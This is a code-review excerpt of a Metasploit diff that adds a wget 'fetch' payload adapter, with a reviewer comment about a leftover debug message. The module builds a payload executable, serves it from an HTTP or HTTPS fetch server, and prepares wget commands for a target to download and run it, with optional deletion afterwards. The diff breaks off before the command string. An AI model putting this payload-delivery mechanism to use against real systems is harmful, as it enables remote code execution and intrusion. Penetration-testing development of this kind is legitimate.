lib/msf/core/payload/adapter/fetch/wget.rb

```diff
@@ -0,0 +1,78 @@
+module Msf::Payload::Adapter::Fetch::Wget
+
+  include Msf::Exploit::EXE
+  include Msf::Payload::Adapter
+  include Msf::Payload::Adapter::Fetch
+  include Msf::Payload::Adapter::Fetch::Server::Https
+
+  def initialize(*args)
+    super
+    register_options(
+      [
+        Msf::OptBool.new('WGET_SILENT', [true, 'Set silent flag in wget command', true]),
+        Msf::OptBool.new('WGET_BACKGROUND', [true, 'Background the wget command', false]),
+      ]
+    )
+    register_advanced_options(
+      [
+        Msf::OptBool.new('WgetFileDelete', [true, 'Attempt to delete payload after execution', true])
+      ]
+    )
+
+    @srvexe = ''
+    @myresources = []
+  end
+
+  def download_uri
+    check_srvhost
+    fetch_uri = datastore['FETCH_SSL'] ? 'https://' : 'http://'
+    fetch_uri << "#{srvhost}:#{srvport}/#{srvuri}"
+  end
+
+  def generate(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    opts[:code] = super
+    @srvexe = generate_payload_exe(opts)
+    wget_http_commands
+  end
+
+  def srvname
+    'fetchserver'
+  end
+
+  def setup_handler
+    vprint_status('Setting up handler')
+    if datastore['FETCH_SSL']
+      print_status('Starting HTTPS server')
+      @fetch_service = start_https_fetch_handler(srvname, @srvexe)
+    else
+      print_status('Starting HTTP server')
+      @fetch_service = start_http_fetch_handler(srvname, @srvexe)
+    end
+    super
+  end
+
+  def cleanup_handler
+    cleanup_http_fetch_service
+    super
+  end
+
+  def wget_http_commands
+    vprint_status('wget_http_commands')
```

Comment:
I'm wondering if this message is useful for the end user. This looks like a leftover from development debugging.